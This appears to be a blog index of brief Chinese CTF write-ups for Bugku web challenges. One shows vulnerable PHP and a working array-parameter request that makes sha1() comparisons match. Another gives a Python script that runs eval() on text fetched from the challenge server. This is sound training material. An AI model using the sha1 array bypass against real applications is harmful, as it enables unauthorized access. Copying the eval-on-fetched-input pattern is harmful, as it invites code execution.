web2

Posted on 2021-09-09 Edited on 2022-07-08 In CTF

Web2

Bugku-各种绕过哟

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

sha1()函数同md5()，可以用数组绕过

1 2	http://114.67.246.176:13558/?id=margin&uname[]=1 postdata:passwd[]=2

sql1

Posted on 2021-09-08 Edited on 2022-07-08 In CTF

查询

web1

Posted on 2021-09-06 Edited on 2022-07-08 In CTF

Bugku-秋名山车神

快速反弹 POST 请求，因为精度问题需要多次尝试

import requests
import re
url = 'http://114.67.246.176:17516/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)

sql0

Posted on 2021-08-02 Edited on 2022-07-08 In CTF

sql0

参考廖雪峰sql教程

web0

Posted on 2021-08-01 Edited on 2022-10-12 In CTF

BP-basic